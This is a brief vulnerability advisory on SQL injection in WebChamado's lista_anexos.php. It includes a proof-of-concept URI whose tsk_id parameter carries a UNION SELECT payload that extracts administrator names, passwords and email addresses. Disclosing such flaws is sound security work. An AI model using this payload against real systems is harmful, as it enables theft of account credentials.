WebChamado 'lista_anexos.php' SQL Injection Vulnerability

WebChamado 'lista_anexos.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/lista_anexos.php?tsk_id=-1/**/union/**/select/**/1,concat(NOM,0x3a,PAS,char(58),EML),3,4/**/from/**/tbltask_res/**/where/**/ADM=1/*